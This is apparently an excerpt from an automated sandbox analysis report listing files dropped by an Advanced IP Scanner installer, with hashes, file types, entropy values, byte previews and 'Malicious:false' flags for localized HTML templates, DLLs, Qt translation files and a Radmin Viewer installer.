                                                                                                                                                                                                  SHA-256:2C9A4462B5BCBDBFE9D7C8E167ECA3CC8DF7DD2440BA0BBE2ACA3E21BA1C4AF6
                                                                                                                                                                                                  SHA-512:58A3A091E8C03C6A83C17EF7FDE3A138EFC609FA9928801ACF75EAF7D19DED809B142940598558049AA12E9DB9F4D2C4D057FB10198D8ABCDCE2876FE983B990
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tillverkare:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anv.ndare:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Detaljer</c

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-FLT6F.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):7.00674396465633
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
                                                                                                                                                                                                  MD5:906CB0C8ABA8342D552B0F37DDFD475F
                                                                                                                                                                                                  SHA1:A3CD528B9C212FEA97495A557A91D638B1608418
                                                                                                                                                                                                  SHA-256:582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
                                                                                                                                                                                                  SHA-512:27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-FNUE4.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22720
                                                                                                                                                                                                  Entropy (8bit):6.8330909328576315
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:sYNpdkKBcyNWVghW/77l9YOCAs/nGfe4pBjSfCKZWNArXVWQ4mWuqnajMHxxBNT5:zuyNW2hWD7QA0GftpBjLKNplI663U4v
                                                                                                                                                                                                  MD5:5245F303E96166B8E625DD0A97E2D66A
                                                                                                                                                                                                  SHA1:1C9ED748763F1FF5B14B8C791A4C29DE753A96AB
                                                                                                                                                                                                  SHA-256:90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5
                                                                                                                                                                                                  SHA-512:AF51F341670F925449E69C4B5F0A82F4FC4EB32913943272C32E3F3F18EE43B4AFB78C0D7D2F965C1ABE6A0F3A368616DD7A4FB74D83D22D1B69B405AEF1E043
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-FOUIF.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):282664
                                                                                                                                                                                                  Entropy (8bit):6.463228483563671
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:ktT9k1wLFm2gcPHRGmRFQZvj/HXvC8CJXNMdyHNAe17LjuEnAZwjJOIaUB547PEa:ktT+1wLFm2gcPHRGmRFQZvj/HXvC1JX4
                                                                                                                                                                                                  MD5:BA337B8D1BC9F117F7605A2B79B10064
                                                                                                                                                                                                  SHA1:9F0502A9E8FE0F34F0DB2B7F6AE31278C1A9B60C
                                                                                                                                                                                                  SHA-256:EBE2A42C21F444D1E6A404694649522E3990C8A08EC9FDD28A5C390FDC873F79
                                                                                                                                                                                                  SHA-512:277529A67E4D4EF978A5F36294F9DAECA5C0A3651BFE0F97C4912ACB3FA588D99E1874AEE224F402EF91FF0A20612A251D1CE519E366FE7712F2696DBC096206
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5P.q1..q1..q1..xI..y1...V..s1..*Y..s1...V..}1...V..{1...V..s1..p\..r1..q1...0..p\..^1..p\..p1..p\w.p1..p\..p1..Richq1..........................PE..L......]...........!....."...........(.......@......................................5.....@.........................`...p$...........@..@............4..(....P...#......T...........................h...@............@...............................text.... .......".................. ..`.rdata......@.......&..............@..@.data....1..........................@....rsrc...@....@......................@..@.reloc...#...P...$..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-GCF43.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, MSI Installer, Number of Characters: 0, Last Saved By: DavidHacker, Number of Words: 0, Title: Radmin Viewer 3.5.2 installation package, Comments: This installer contains the logic and data to install Radmin Viewer 3.5.2, Keywords: Installer,MSI,Database, Subject: Radmin Viewer 3.5.2, Author: Famatech, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 12 - Professional Edition 12.0, Revision Number: {FAB726D2-8076-4144-B0E6-C4FC2A838845}, Last Saved Time/Date: Thu Dec 14 03:24:44 2017, Create Time/Date: Thu Dec 14 03:24:44 2017, Last Printed: Thu Dec 14 03:24:44 2017, Code page: 1252, Template: Intel;1033
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5409792
                                                                                                                                                                                                  Entropy (8bit):7.888464776356177
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:/YyLObvirO9mCdfl2nus7iOlkwAI2ljeoKleOA56VJJ8bXSUvmdMjGerZSJi:FGKrofl2xG1ICGleD6DJ8DSUv+EJZSJi
                                                                                                                                                                                                  MD5:8E36ECA249C08969EF5C0822928416D6
                                                                                                                                                                                                  SHA1:1937E555B760B4A3E13667BE189A9A9B9C9FAF8C
                                                                                                                                                                                                  SHA-256:052EE17B1544F3E1466DF561D7BAAA4BB694320803102C96FCD3560BEEB3B5C3
                                                                                                                                                                                                  SHA-512:C7B9DE31660CD56AAC2D30C3EF4E5C041E6A1108B3B058EA08C2C9A08AD235398E15AE5FDC76263476864BB964443035F383EA3CB82FFA715D8583ABEB9C5AB1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:......................>...................S...............8....................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0....................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...E...I...:...;...<...=...>...?...@...A...B...C...D.......F...Y...H...J.......K...M...........W...P...Q...R...S...T...U...V...G...X.......Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-GEC8S.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1153
                                                                                                                                                                                                  Entropy (8bit):4.788912446448768
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFouzisuSpI/XqOQ/HJla0Kt5RGDFTHReEhyv:HnesRpaXqOyHJla0U2DFJs
                                                                                                                                                                                                  MD5:FBA663967DF5DD4AB38D38DA1362598E
                                                                                                                                                                                                  SHA1:9557B768C03EB179FDEBB5F74724985F51685203
                                                                                                                                                                                                  SHA-256:466C8D1C6798F392281C81AF34638C334489AB56C7DB86A3A23B1EDB2918C2DA
                                                                                                                                                                                                  SHA-512:427505B6A8278CF009E4051D458BDABCBBE83B9D8B279FB7267777403E50BF26570D1FBD6EB4CD73E6F28E5565CEEA2B02B1EC3197FD85E78B5B0AB932FAC2D1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Betriebssystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Hersteller:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anwender:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Art:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentare:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Dienst</center></b></td><td><b><center>Ausf.hrlich</ce

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-GKGH6.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27204
                                                                                                                                                                                                  Entropy (8bit):5.005345988323232
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OpTFOkqnz8B1NM9aQ3T07mnagn7UMHJEt5jTlAXSHjcvHrP:ORFInz8BbM9aQ3w7gaMJk0
                                                                                                                                                                                                  MD5:53839022420E21292B81995749C5BCBD
                                                                                                                                                                                                  SHA1:D050A1FD64DCA4D57F9C15B71838811F3C5CF51B
                                                                                                                                                                                                  SHA-256:44900BCBB56194E2153DD1F0963DC5947C817C2A33D3A55E39A3DCDE1FDEB66A
                                                                                                                                                                                                  SHA-512:6D93BB2E3C193F21EC86456694B447899C21CC3CCE606307E9EAB3F8A8F0D92DE75A167C94F20F8AC45BFEE5F7E9192257D5F17AF46DF44598DE77E6FB5E008B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Vp...;...`...;.......;.......;.. ....;..A....O..Y4...[..U ...^.......^..Q...(5......G.......H,..N...K...=...N:......V...B..._...Zj......((......NE...y..N................2......VH...t..)....t..O6...t..X......>....j......5t......@...@...H5..W...f...........C........q...........~..1~...`..5....e..XW......X.......... =...D..*.y.....*.y.....*.%..$X.*.0..$..+.......+.....J.+....R.+......+....&..G.......G....*..H0...X..Hw9.....Hw9.....I....'..J6....0.J6......J6....Z.J6...G..LD......L.b..Y..M.S..?T.R.......V..../..Wi...W..W.T.....Z.|..O..[f3..S..gc......w0K..E...H...%1......Y....T......."..3D...~..5`.. d..D1...T..-K..2...........Wv......]..9.E..>f.L.#..`'.M$o.....e.....f.l8...5....^..GL..I....B......@.......P.......W5..>...'..>......3......l...H.......8R.5.l..\..AV...'..y....U....0..Q.......P.......V...tb..3.......................Q.......;.......L..(....Q>.1V...(..R....0..W.<..]..f.~..!.......2...1........^..4i...5...u......H...c..Dr.;6...^..q.J..M...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-H2NGU.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1147
                                                                                                                                                                                                  Entropy (8bit):4.784372507341765
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFourZsuSd/Xqk/Hu0B10Kt5RGDz9ScReEhyv:HnrZsRhXqmHu410U2Dz9S+s
                                                                                                                                                                                                  MD5:04C416BEC9FE7DEC52E2F368353FF1F9
                                                                                                                                                                                                  SHA1:DB86325EDF8EED3639A26ED279A00EBC9208ED1E
                                                                                                                                                                                                  SHA-256:10946712CE123E177350A9D96F61B2011FFCCC90597880F256E3A24676CD4B30
                                                                                                                                                                                                  SHA-512:4069E9327ED9BE5FA81EF9A7148959B376677710D8D77CE1B247AF5065C1E7B2CC50561E47F7AEBA2DA48A8FBC79752147CCF262A8C1E6A66408ACFF07489E29
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operating system:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Manufacturer:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>User:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comments:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</center><

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-H544T.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                  Entropy (8bit):5.137449444677303
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFo/JhkCsuSH9ioXqIVoH39/m0Kt5RGDISReEhyv:HYZsRH9ZXqImHN/m0U2DIYs
                                                                                                                                                                                                  MD5:C09C9A49D20E9E03FBA82E0247B38770
                                                                                                                                                                                                  SHA1:B95253268F788CEB0B603E194C4AB1A7451B2C44
                                                                                                                                                                                                  SHA-256:717CDB05CB153C7C3389BA679B737EE4CABB7DF340AE74B6971CB231526EA3AD
                                                                                                                                                                                                  SHA-512:BAE15F62E99B43C1D7EF0AC4F5BEAFEA1629428668DE1237CDE1903E03B462EB687DE089DFB87B77CA97E8D02D72650EB274595F07DE6DD86FD459C634B97594
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>......:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............ .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-HA61E.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):7.0606914357897885
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:B6awWVghW/d7l9YOCAs/nGfe4pBjSf/pjWNArXVWQ4mWgmqnajLQvTP+8jP9Tz8U:WW2hWF7QA0GftpBjQ9YlvQyURz8RG
                                                                                                                                                                                                  MD5:A20084F41B3F1C549D6625C790B72268
                                                                                                                                                                                                  SHA1:E3669B8D89402A047BFBF9775D18438B0D95437E
                                                                                                                                                                                                  SHA-256:0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1
                                                                                                                                                                                                  SHA-512:DDF294A47DD80B3ABFB3A0D82BC5F2B510D3734439F5A25DA609EDBBD9241ED78045114D011925D61C3D80B1CCD0283471B1DAD4CF16E2194E9BC22E8ABF278F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-HKV38.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1179
                                                                                                                                                                                                  Entropy (8bit):4.8880159035742965
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoxnsuSzf9Xqkf9HMXQph0Kt5RGDtn9U8ReEhyv:HqnsRJXqklHMAr0U2Dtn9Js
                                                                                                                                                                                                  MD5:1588431C36A3112355553A6967E3405E
                                                                                                                                                                                                  SHA1:0987D0C5E70F9F25B2E83AA314C83EC8B67539E8
                                                                                                                                                                                                  SHA-256:69655CAB681BC5E4B8AB6D3E160CE914193156E9FD09DA36B3116B6BB958457B
                                                                                                                                                                                                  SHA-512:F4A1362AA900BA4B854E8DB2653D21A26D6A21151D2A979076C81B9F1DC9048DA95EE193C9FA4EDB67E8F85D71F23460C2180213D031B548DCFC495F58990351
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statuss:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.t.jsist.ma:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Ra.ot.js:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Lietot.js:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tips:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datums:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.ri:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Pakalpojums</center></b></td><td><b><center>De

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-HL63K.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28344
                                                                                                                                                                                                  Entropy (8bit):4.687451491727224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:qjVfhQdGPdlCzQt1OY8L7HP7xpLnR0l7sY1m1ZDxE0FTlHwLGW6F0:qjthQoPdlkQt1O1Hv7xpLnul7xcFxFr0
                                                                                                                                                                                                  MD5:950906410E936E0BB5F109082105D7B6
                                                                                                                                                                                                  SHA1:C2B7B811141FDAC2DBC712095759E3C68CE77565
                                                                                                                                                                                                  SHA-256:F0DB0B2040454AE4CF27A7398C28E4C32CD0151D30AD1ED59ACC8C8C021335CF
                                                                                                                                                                                                  SHA-512:FC7A0D8B6E9D1E82E8596CCF57889B55B455D3A8036D78FB190BEDC724BC28588F68A295C42AEBBEC1623F7AE78ADACD94F2791F4008874C0B7CFFD2845181AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........ZB...;.......;.......;.......;..!}...;..Dp...O..]....[..X....^..07...^..T...(5......G.......H,..Q...K...@...N:...h..V...E..._...^h......)Z......Q....y..RS......................Z....t..+....t..R....t..\......A....j......5t......@...C...H5..Z...f...0g......F................!...~..3J...`..8"...e..\3......\].......H. =...G..*.y.....*.y...].*.%..%6.*.0..%g.+.....U.+.......+......+......+....'..G.... ..G....+m.H0...\..Hw9.....Hw9.....I....(..J6......J6......J6......J6...JY.LD......L.b..\..M.S..B&.R.......V....0..Wi...[..W.T.....Z.|..S..[f3..Wd.gc....F.w0K..I...H...&.......]....T......."..5....~..7... d..G....T......2....M......[L......a..9.E..A..L.#..d..M$o.....e.......l8...79...^..J...I....f......C.......Ti......[...>...]..>......3../...l...L ......:..5.l..`..AV...(..y....YQ...0..UH......T%......Z...tb..68.......!..............U.......>>......PB.(....T..1V...)..R....2=.W.<..aE.f.~.."x......5...1....I...^..6....5...=..........c..Gr.;6...b..q.J..Q8..I....M..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-I1VEE.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):6.97908669425612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:MGMWVghW/AvSx9YOCAs/nGfe4pBjSf6qy4X3WNArXVWQ4mWwiS21qnaj9RlS6VEX:iW2hWoSUA0GftpBjfHWbziS2lBRAkEX
                                                                                                                                                                                                  MD5:2886C75F8B9D3EFDF315C44B52847AEE
                                                                                                                                                                                                  SHA1:4FC75E39493B356F1F219798E3738DBC764281E4
                                                                                                                                                                                                  SHA-256:3DB27D95689F936B4591EBAD18173AD07FAC07D69D68EEFF06DEE158599D731F
                                                                                                                                                                                                  SHA-512:2931224106EEEA142664AEC9D1D5D028D15A14765BCE8674D34D67FC027F6FEFF3AF283F3D81B113E6EFCD42E6B4BD249E94E01C8F41B5211650F1775774B765
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......9+....@.............................9............ ...................<..............8............................................................................text...I........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-IDMK1.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26959
                                                                                                                                                                                                  Entropy (8bit):4.713288631353564
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ihIXQdwIyWqLSTgN1YYgX+9S1Dk+nK+sF7SVLHElRh:3XQdwIUCgN1YYgE2k1A4
                                                                                                                                                                                                  MD5:AE4754AC60C32B9D44B47CAA489E5337
                                                                                                                                                                                                  SHA1:6C3AEC0A9EF0945C06562D0ACD0E0558E18992AD
                                                                                                                                                                                                  SHA-256:D09D333B00D073C09837F669D7A8DDD77D50B2D94A177E58CE556AF83700371A
                                                                                                                                                                                                  SHA-512:74710A20298F162D6BE02F7BCBB964E447345D219887216366A7DCD283267A708666E974195F279E384526E324E27F0FBD713411E6BA58DE266069143575C6DC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........U....;.......;.......;.......;.. A...;..@....O..XZ...[..TL...^...1...^..P:..(5......G....6..H,..MT..K...=@..N:...,..V...B#.._...Yn......'.......M....y..M.......................U~...t..)I...t..NV...t..X......>....j...[..5t...-..@...?...H5..V?..f....W......B........u.......Y...~..1....`..5....e..W.......W........:. =...C..*.y...B.*.y...E.*.%..#..*.0..#..+.......+.......+......+......+....%q.G.....g.G....)..H0...W..Hw9...g.Hw9.....I....'T.J6......J6....@.J6......J6...Fo.LD......L.b..X2.M.S..>..R.....\.V.....{.Wi...W4.W.T.....Z.|..O..[f3..R..gc....~.w0K..E...H...$w......X....T......."..2....~..4... d..Cc...T..,...2...........V.......\..9.E..=..L.#.._!.M$o.....e.......l8...4c...^..F...I....L......@"......O.......Vg..>......>...n..3..-...l...H*......7..5.l..[..AV...'..y....T....0..P.......O.......V...tb..3z.......s.......y......Q.......:.......L..(....Pf.1V...($.R....0).W.<..\).f.~..!.......2r..1........^..3....5..............c..C..;6...]..q.J..L...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\is-IK26N.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28416
                                                                                                                                                                                                  Entropy (8bit):4.745555315840919
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:G1rjeSTVZbKagGwTFToL3RvDWI7zfoiOp3cHWyQ68rZPFaEvRVaib:OHfKagGwTFTWdDWI7boiOp3cHW3P1RVB
                                                                                                                                                                                                  MD5:A8F9FC9108D8E44F2111BC7AC63C9F75
                                                                                                                                                                                                  SHA1:1692FD262A44FD674D4E48644CE22C175AF0C865
